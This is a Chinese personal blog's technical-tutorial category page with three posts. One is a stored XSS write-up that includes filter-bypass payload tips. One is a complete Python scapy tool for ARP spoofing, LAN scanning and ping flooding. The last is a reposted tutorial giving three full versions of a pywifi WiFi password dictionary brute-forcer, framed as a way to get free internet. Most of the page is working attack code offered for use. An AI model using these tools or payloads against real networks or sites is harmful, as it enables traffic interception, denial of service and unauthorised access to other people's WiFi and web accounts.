分类技术教程下的文章 - 阿玖博客·AJiu_Blog｜学习进步每一天！

登录 / 注册

标签搜索

阿玖

累计撰写 9 篇文章
累计收到 25 条评论

搜索到 3 篇与技术教程的结果

2021-09-21
记录某商城存在xss存储型xss- 陈sir讲安全我也是第一次写技术类文章,下面看看漏洞情况吧我在是在详细地址插入的语句插入一条” onclick=”alert(11)然后我们看效果当点击详细地址这个框的时候就会触发弹窗,接下来我们看看源码是什么情况他对双引号没转意,也没对弹窗函数和括号进行转意复现到这里也就结束了!这个漏洞我以上报CNVD,并且已经修复,只可惜给我10个积分.唉下面总结一下吧怎样去测xss漏洞了?1,先随便输入几个数字和字母,然后去HTML源码里去找,看哪里出现了你输入的东西不要只找到一个就不找了.2.不要一看见框就直接插入xss语句,我们要先看他对啥转意,比如输入888’,888”,88& 888<>,888()这些东西去看有没有过滤1,有人会问为啥要先输入几个字符,去看看在源码里是否有,因为这样做的话可以为你找很多条路,如果你找到了一个它是被双引号或者被单引号包住了,然后网站又过滤单双引号了,而你又不知道下面还有是被尖阔号所包含,恰巧网站对尖扩号没有过滤,你是不是吧以漏洞擦肩而过2,那又有人会问为啥不直接插xss语句,那好,如果一个网站啥特殊符号都过滤基本都不存在xss漏洞,你一条一条的插不浪费时间?,你要先弄清楚他过滤啥东西,好对症下药下我给出绕过过滤的几个小技巧巧妙使用他们由于我给出的转意符,编辑器直接给我转了所以我给大家截了图如果“alert”被拉黑了咋办,那当然是用“prompt”这函数照样可以弹窗如果“alert”被拉黑了我也是可以用%00来欺骗waf的如果有些函数被拉黑了还可以使用制表符, 换行符和回车符我也贴出来由于我给出的制表符, 换行符和回车符,编辑器直接给我转了所以我给大家截了图我们还可以给一些特殊符号进行URL编码(有的编一层就过了,有的需要多遍几层,但是有的咋遍多不会过)切记总之找漏洞不要太死板活一点
- 2021年09月21日
- 108 阅读
- 0 评论
- 3 点赞
2021-09-20
python实现ARP攻击 from scapy.all import * import threading import socket import uuid import time import os intro = ''' ┌─────────────────────────────────────────────┐ │ pressure cooker │ ├─────────────────────────────────────────────┤ │ function │ │ [h] Host scan │ │ [o] Host spoofing │ │ [p] Death Ping │ │ expect ! │ ├─────────────────────────────────────────────┤ │ Author:CentOS NACA │ └─────────────────────────────────────────────┘ ''' def ping(attackIP): count = 1 while True: cmd = "ping %s -l 65500" % attackIP print(cmd) result = os.system(cmd) print(result) print("Sent", count) count += 1 def gateway_mac_1(gateway_ip): try: gateway_mac_2 = getmacbyip(gateway_ip) return gateway_mac_2 except(): print('[-]请检查网关MAC是否存活') def get_mac(Target_IP): try: tgtMac = getmacbyip(Target_IP) return tgtMac except(): print('[-]请检查目标IP是否存活') def get_mac_address(): mac = uuid.UUID(int=uuid.getnode()).hex[-12:] return ":".join([mac[e:e + 2] for e in range(0, 11, 2)]) def host_discovery(host_computer): IpScan = host_computer + '/24' try: ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=IpScan), timeout=2) except Exception as opp: print(opp) else: print("[%d] LAN survived" % (len(ans))) print(" MAC address IP address") print(" ") for send, rcv in ans: ListMACAddr = rcv.sprintf("%Ether.src% ----------- %ARP.psrc%") print(ListMACAddr) def host_arp_spoofing(native_mac, target_mac, gateway_ip, Target_ip): data_packet = Ether(src=native_mac, dst=target_mac) / ARP(hwsrc=native_mac, psrc=gateway_ip, hwdst=target_mac, pdst=Target_ip, op=2) return data_packet def gateway_arp_spoofing(native_mac, gateway_mac, gateway_ip, Target_ip): data_packet = Ether(src=native_mac, dst=gateway_mac) / ARP(hwsrc=native_mac, psrc=Target_ip, hwdst=gateway_mac, pdst=gateway_ip, op=2) return data_packet def main(): print(intro) print("\033[1;32mSelect mode!\033[0m") pattern = input('\033[1;31m[*]\033[0m==>') if pattern == 'h': print('Please enter local v4ip') host_computer = input("\033[1;31m[*]\033[0m==>") wait_a_moment = input("\033[1;31m[.....]\033[0m press any key to continue") host_discovery(host_computer) if pattern == 'o': try: native_mac = get_mac_address() # 本机Mac地址 print("Enter the ip address of the target") # 目标ip地址 Target_ip = input("\033[1;31m[*]\033[0m==>") target_mac = get_mac(Target_ip) # ip转Mac地址 print("Enter the IP address of the gateway") # 网关IP地址 gateway_ip = input("\033[1;31m[*]\033[0m==>") gateway_mac = gateway_mac_1(gateway_ip) # 网关Mac地址 print("The local MAC address is:", native_mac) print("The MAC address of the target computer is:", target_mac) print("The gateway IP address is:", gateway_ip) print("The gateway MAC address is:", gateway_mac) except(): print("\033[1;31m[!]\033[0mPlease enter the correct parameters") try: print("Number of ARP attacks launched") frequency = input("Unlimited attack [y/n] default[n]") implement = host_arp_spoofing(native_mac, target_mac, gateway_ip, Target_ip) gateway = gateway_arp_spoofing(native_mac, gateway_mac, gateway_ip, Target_ip) if frequency == 'y': wait_a_moment_1 = input("\033[1;31m[.....]\033[0m press any key to continue") count = 1 while True: thread = threading.Thread(target=sendp, args=(implement,)) thread.start() thread.join() print("\033[1;36mSend [%d] computer ARP Spoofing packet\033[0m" % count) thread_q = threading.Thread(target=sendp, args=(gateway,)) thread_q.start() thread.join() print("Send [%d] gateway ARP Spoofing packet" % count) count += 1 count_1 = 1 if frequency == 'n': wait_a_moment_2 = input("\033[1;31m[.....]\033[0m press any key to continue") Setting_times = input("\033[1;31m[+]\033[0mEnter the number of cycles==>") for loop in range(int(Setting_times)): thread = threading.Thread(target=sendp, args=(implement,)) thread.start() thread.join() print("\033[1;36mSend [%d] computer ARP Spoofing packet\033[0m" % count_1) thread_q = threading.Thread(target=sendp, args=(gateway,)) thread_q.start() thread.join() print("Send [%d] gateway ARP Spoofing packet" % count_1) count_1 += 1 except(): print('\033[1;31m[!]\033[0mPlease select the correct mode') if pattern == 'p': attackIP = input("\033[1;31m[*]\033[0Attack IP address===>") wait_a_moment_2 = input("\033[1;31m[.....]\033[0m press any key to continue") ping(attackIP) if __name__ == '__main__': main() ————————————————版权声明：本文为CSDN博主「retuen」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。原文链接：https://blog.csdn.net/retuen/article/details/108918668
- 2021年09月20日
- 155 阅读
- 1 评论
- 1 点赞
2021-09-05
[转载]python 之 WiFi密码爆破最近阿玖在家没有WiFi，所以研究了一下WiFi破解，发现最简单的方法就是字典爆破，然后再查阅有关资料发现了这篇文章，觉得挺有意思，所以转载出来给大家看看。原文链接放在文末。通过 Python 脚本实现 WIFI 密码的暴力破解，从而实现免费蹭网原作者研究了以下三个版本{tabs}{tabs-pane label="WiFi爆破1.0"} 先来看看无界面版本 {mtitle title="WiFi爆破1.0"/}import pywifi from pywifi import const import time import datetime # 测试连接，返回链接结果 def wifiConnect(pwd): # 抓取网卡接口 wifi = pywifi.PyWiFi() # 获取第一个无线网卡 ifaces = wifi.interfaces()[0] # 断开所有连接 ifaces.disconnect() time.sleep(1) wifistatus = ifaces.status() if wifistatus == const.IFACE_DISCONNECTED: # 创建WiFi连接文件 profile = pywifi.Profile() # 要连接WiFi的名称 profile.ssid = "Tr0e" # 网卡的开放状态 profile.auth = const.AUTH_ALG_OPEN # wifi加密算法,一般wifi加密算法为wps profile.akm.append(const.AKM_TYPE_WPA2PSK) # 加密单元 profile.cipher = const.CIPHER_TYPE_CCMP # 调用密码 profile.key = pwd # 删除所有连接过的wifi文件 ifaces.remove_all_network_profiles() # 设定新的连接文件 tep_profile = ifaces.add_network_profile(profile) ifaces.connect(tep_profile) # wifi连接时间 time.sleep(2) if ifaces.status() == const.IFACE_CONNECTED: return True else: return False else: print("已有wifi连接") # 读取密码本 def readPassword(): success = False print("****************** WIFI破解 ******************") # 密码本路径 path = "pwd.txt" # 打开文件 file = open(path, "r") start = datetime.datetime.now() while True: try: pwd = file.readline() # 去除密码的末尾换行符 pwd = pwd.strip('\n') bool = wifiConnect(pwd) if bool: print("[*] 密码已破解：", pwd) print("[*] WiFi已自动连接！！！") success = True break else: # 跳出当前循环，进行下一次循环 print("正在破解 SSID 为 %s 的 WIFI密码，当前校验的密码为：%s"%("Tr0e",pwd)) except: continue end = datetime.datetime.now() if(success): print("[*] 本次破解WIFI密码一共用了多长时间：{}".format(end - start)) else: print("[*] 很遗憾未能帮你破解出当前指定WIFI的密码，请更换密码字典后重新尝试！") exit(0) if __name__=="__main__": readPassword()代码运行效果： {/tabs-pane}{tabs-pane label="WiFi爆破2.0"} 1.0版本需内嵌 WIFI 名、爆破字典路径，缺少灵活性。下面进行改造优化： {mtitle title="WiFi爆破2.0"/}import pywifi import time from pywifi import const # WiFi扫描模块 def wifi_scan(): # 初始化wifi wifi = pywifi.PyWiFi() # 使用第一个无线网卡 interface = wifi.interfaces()[0] # 开始扫描 interface.scan() for i in range(4): time.sleep(1) print('\r扫描可用 WiFi 中，请稍后。。。（' + str(3 - i), end='）') print('\r扫描完成！\n' + '-' * 38) print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名')) # 扫描结果，scan_results()返回一个集，存放的是每个wifi对象 bss = interface.scan_results() # 存放wifi名的集合 wifi_name_set = set() for w in bss: # 解决乱码问题 wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) wifi_name_set.add(wifi_name_and_signal) # 存入列表并按信号排序 wifi_name_list = list(wifi_name_set) wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True) num = 0 # 格式化输出 while num < len(wifi_name_list): print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1 print('-' * 38) # 返回wifi列表 return wifi_name_list # WIFI破解模块 def wifi_password_crack(wifi_name): # 字典路径 wifi_dic_path = input("请输入本地用于WIFI暴力破解的密码字典（txt格式，每个密码占据1行）的路径：") with open(wifi_dic_path, 'r') as f: # 遍历密码 for pwd in f: # 去除密码的末尾换行符 pwd = pwd.strip('\n') # 创建wifi对象 wifi = pywifi.PyWiFi() # 创建网卡对象，为第一个wifi网卡 interface = wifi.interfaces()[0] # 断开所有wifi连接 interface.disconnect() # 等待其断开 while interface.status() == 4: # 当其处于连接状态时，利用循环等待其断开 pass # 创建连接文件（对象） profile = pywifi.Profile() # wifi名称 profile.ssid = wifi_name # 需要认证 profile.auth = const.AUTH_ALG_OPEN # wifi默认加密算法 profile.akm.append(const.AKM_TYPE_WPA2PSK) profile.cipher = const.CIPHER_TYPE_CCMP # wifi密码 profile.key = pwd # 删除所有wifi连接文件 interface.remove_all_network_profiles() # 设置新的wifi连接文件 tmp_profile = interface.add_network_profile(profile) # 开始尝试连接 interface.connect(tmp_profile) start_time = time.time() while time.time() - start_time < 1.5: # 接口状态为4代表连接成功（当尝试时间大于1.5秒之后则为错误密码，经测试测正确密码一般都在1.5秒内连接，若要提高准确性可以设置为2s或以上，相应暴力破解速度就会变慢） if interface.status() == 4: print(f'\r连接成功！密码为：{pwd}') exit(0) else: print(f'\r正在利用密码 {pwd} 尝试破解。', end='') # 主函数 def main(): # 退出标致 exit_flag = 0 # 目标编号 target_num = -1 while not exit_flag: try: print('WiFi万能钥匙'.center(35, '-')) # 调用扫描模块，返回一个排序后的wifi列表 wifi_list = wifi_scan() # 让用户选择要破解的wifi编号，并对用户输入的编号进行判断和异常处理 choose_exit_flag = 0 while not choose_exit_flag: try: target_num = int(input('请选择你要尝试破解的wifi：')) # 如果要选择的wifi编号在列表内，继续二次判断，否则重新输入 if target_num in range(len(wifi_list)): # 二次确认 while not choose_exit_flag: try: choose = str(input(f'你选择要破解的WiFi名称是：{wifi_list[target_num][1]}，确定吗？（Y/N）')) # 对用户输入进行小写处理，并判断 if choose.lower() == 'y': choose_exit_flag = 1 elif choose.lower() == 'n': break # 处理用户其它字母输入 else: print('只能输入 Y/N 哦o(*￣︶￣*)o') # 处理用户非字母输入 except ValueError: print('只能输入 Y/N 哦o(*￣︶￣*)o') # 退出破解 if choose_exit_flag == 1: break else: print('请重新输入哦(*^▽^*)') except ValueError: print('只能输入数字哦o(*￣︶￣*)o') # 密码破解，传入用户选择的wifi名称 wifi_password_crack(wifi_list[target_num][1]) print('-' * 38) exit_flag = 1 except Exception as e: print(e) raise e if __name__ == '__main__': main()脚本运行效果如下：　上述代码实现了依据信号强度枚举当前附近的所有 WIFI 名称，并且可供用户自主选择需要暴力破解的 WIFI，同时还可灵活指定暴力破解的字典，相对而言体验感提升了不少。进一步也可以将上述脚本打包生成 exe 文件，双击运行效果如下： {/tabs-pane}{tabs-pane label="WiFi爆破3.0"} 下面基于 Python 的 GUI 图形界面开发库 Tkinter 优化上述脚本，实现友好的可视化 WIFI 暴力破解界面工具. {mtitle title="简单版ui"/}from tkinter import * from pywifi import const import pywifi import time # 主要步骤： # 1、获取第一个无线网卡 # 2、断开所有的wifi # 3、读取密码本 # 4、设置睡眠时间 def wificonnect(str, wifiname): # 窗口无线对象 wifi = pywifi.PyWiFi() # 抓取第一个无线网卡 ifaces = wifi.interfaces()[0] # 断开所有的wifi ifaces.disconnect() time.sleep(1) if ifaces.status() == const.IFACE_DISCONNECTED: # 创建wifi连接文件 profile = pywifi.Profile() profile.ssid = wifiname # wifi的加密算法 profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi的密码 profile.key = str # 网卡的开发 profile.auth = const.AUTH_ALG_OPEN # 加密单元,这里需要写点加密单元否则无法连接 profile.cipher = const.CIPHER_TYPE_CCMP # 删除所有的wifi文件 ifaces.remove_all_network_profiles() # 设置新的连接文件 tep_profile = ifaces.add_network_profile(profile) # 连接 ifaces.connect(tep_profile) time.sleep(3) if ifaces.status() == const.IFACE_CONNECTED: return True else: return False def readPwd(): # 获取wiif名称 wifiname = entry.get().strip() path = r'./pwd.txt' file = open(path, 'r') while True: try: # 读取 mystr = file.readline().strip() # 测试连接 bool = wificonnect(mystr, wifiname) if bool: text.insert(END, '密码正确' + mystr) text.see(END) text.update() file.close() break else: text.insert(END, '密码错误' + mystr) text.see(END) text.update() except: continue # 创建窗口 root = Tk() root.title('wifi破解') root.geometry('500x400') # 标签 label = Label(root, text='输入要破解的WIFI名称：') # 定位 label.grid() # 输入控件 entry = Entry(root, font=('微软雅黑', 14)) entry.grid(row=0, column=1) # 列表控件 text = Listbox(root, font=('微软雅黑', 14), width=40, height=10) text.grid(row=1, columnspan=2) # 按钮 button = Button(root, text='开始破解', width=20, height=2, command=readPwd) button.grid(row=2, columnspan=2) # 显示窗口 root.mainloop()脚本运行效果： {mtitle title="ui升级"/}from tkinter import * from tkinter import ttk import pywifi from pywifi import const import time import tkinter.filedialog # 在Gui中打开文件浏览 import tkinter.messagebox # 打开tkiner的消息提醒框 class MY_GUI(): def __init__(self, init_window_name): self.init_window_name = init_window_name # 密码文件路径 self.get_value = StringVar() # 设置可变内容 # 获取破解wifi账号 self.get_wifi_value = StringVar() # 获取wifi密码 self.get_wifimm_value = StringVar() # 抓取网卡接口 self.wifi = pywifi.PyWiFi() # 抓取第一个无线网卡 self.iface = self.wifi.interfaces()[0] # 测试链接断开所有链接 self.iface.disconnect() time.sleep(1) # 休眠1秒 # 测试网卡是否属于断开状态 assert self.iface.status() in \ [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE] def __str__(self): # 自动会调用的函数，返回自身的网卡 return '(WIFI:%s,%s)' % (self.wifi, self.iface.name()) # 设置窗口 def set_init_window(self): self.init_window_name.title("WIFI破解工具") self.init_window_name.geometry('+500+200') labelframe = LabelFrame(width=400, height=200, text="配置") # 框架，以下对象都是对于labelframe中添加的 labelframe.grid(column=0, row=0, padx=10, pady=10) self.search = Button(labelframe, text="搜索附近WiFi", command=self.scans_wifi_list).grid(column=0, row=0) self.pojie = Button(labelframe, text="开始破解", command=self.readPassWord).grid(column=1, row=0) self.label = Label(labelframe, text="目录路径：").grid(column=0, row=1) self.path = Entry(labelframe, width=12, textvariable=self.get_value).grid(column=1, row=1) self.file = Button(labelframe, text="添加密码文件目录", command=self.add_mm_file).grid(column=2, row=1) self.wifi_text = Label(labelframe, text="WiFi账号：").grid(column=0, row=2) self.wifi_input = Entry(labelframe, width=12, textvariable=self.get_wifi_value).grid(column=1, row=2) self.wifi_mm_text = Label(labelframe, text="WiFi密码：").grid(column=2, row=2) self.wifi_mm_input = Entry(labelframe, width=10, textvariable=self.get_wifimm_value).grid(column=3, row=2,sticky=W) self.wifi_labelframe = LabelFrame(text="wifi列表") self.wifi_labelframe.grid(column=0, row=3, columnspan=4, sticky=NSEW) # 定义树形结构与滚动条 self.wifi_tree = ttk.Treeview(self.wifi_labelframe, show="headings", columns=("a", "b", "c", "d")) self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview) self.wifi_tree.configure(yscrollcommand=self.vbar.set) # 表格的标题 self.wifi_tree.column("a", width=50, anchor="center") self.wifi_tree.column("b", width=100, anchor="center") self.wifi_tree.column("c", width=100, anchor="center") self.wifi_tree.column("d", width=100, anchor="center") self.wifi_tree.heading("a", text="WiFiID") self.wifi_tree.heading("b", text="SSID") self.wifi_tree.heading("c", text="BSSID") self.wifi_tree.heading("d", text="signal") self.wifi_tree.grid(row=4, column=0, sticky=NSEW) self.wifi_tree.bind("<Double-1>", self.onDBClick) self.vbar.grid(row=4, column=1, sticky=NS) # 搜索wifi def scans_wifi_list(self): # 扫描周围wifi列表 # 开始扫描 print("^_^ 开始扫描附近wifi...") self.iface.scan() time.sleep(15) # 在若干秒后获取扫描结果 scanres = self.iface.scan_results() # 统计附近被发现的热点数量 nums = len(scanres) print("数量: %s" % (nums)) # 实际数据 self.show_scans_wifi_list(scanres) return scanres # 显示wifi列表 def show_scans_wifi_list(self, scans_res): for index, wifi_info in enumerate(scans_res): self.wifi_tree.insert("", 'end', values=(index + 1, wifi_info.ssid, wifi_info.bssid, wifi_info.signal)) # 添加密码文件目录 def add_mm_file(self): self.filename = tkinter.filedialog.askopenfilename() self.get_value.set(self.filename) # Treeview绑定事件 def onDBClick(self, event): self.sels = event.widget.selection() self.get_wifi_value.set(self.wifi_tree.item(self.sels, "values")[1]) # 读取密码字典，进行匹配 def readPassWord(self): self.getFilePath = self.get_value.get() self.get_wifissid = self.get_wifi_value.get() pwdfilehander = open(self.getFilePath, "r", errors="ignore") while True: try: self.pwdStr = pwdfilehander.readline() if not self.pwdStr: break self.bool1 = self.connect(self.pwdStr, self.get_wifissid) if self.bool1: self.res = "[*] 密码正确！wifi名：%s，匹配密码：%s " % (self.get_wifissid, self.pwdStr) self.get_wifimm_value.set(self.pwdStr) tkinter.messagebox.showinfo('提示', '破解成功！！！') print(self.res) break else: self.res = "[*] 密码错误！wifi名:%s，匹配密码：%s" % (self.get_wifissid, self.pwdStr) print(self.res) time.sleep(3) except: continue # 对wifi和密码进行匹配 def connect(self, pwd_Str, wifi_ssid): # 创建wifi链接文件 self.profile = pywifi.Profile() self.profile.ssid = wifi_ssid # wifi名称 self.profile.auth = const.AUTH_ALG_OPEN # 网卡的开放 self.profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi加密算法 self.profile.cipher = const.CIPHER_TYPE_CCMP # 加密单元 self.profile.key = pwd_Str # 密码 self.iface.remove_all_network_profiles() # 删除所有的wifi文件 self.tmp_profile = self.iface.add_network_profile(self.profile) # 设定新的链接文件 self.iface.connect(self.tmp_profile) # 链接 time.sleep(5) if self.iface.status() == const.IFACE_CONNECTED: # 判断是否连接上 isOK = True else: isOK = False self.iface.disconnect() # 断开 time.sleep(1) # 检查断开状态 assert self.iface.status() in \ [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE] return isOK def gui_start(): init_window = Tk() ui = MY_GUI(init_window) print(ui) ui.set_init_window() init_window.mainloop() if __name__ == "__main__": gui_start()脚本运行效果如下： {/tabs-pane}{/tabs}{card-describe title="原文链接"}https://blog.csdn.net/weixin_39190897/article/details/119778471{/card-describe}{music id="1491221473" color="#1989fa" autoplay="autoplay"/}
- 2021年09月05日
- 350 阅读
- 0 评论
- 4 点赞

陈sir

9 文章数

25 评论量

人生倒计时

标签云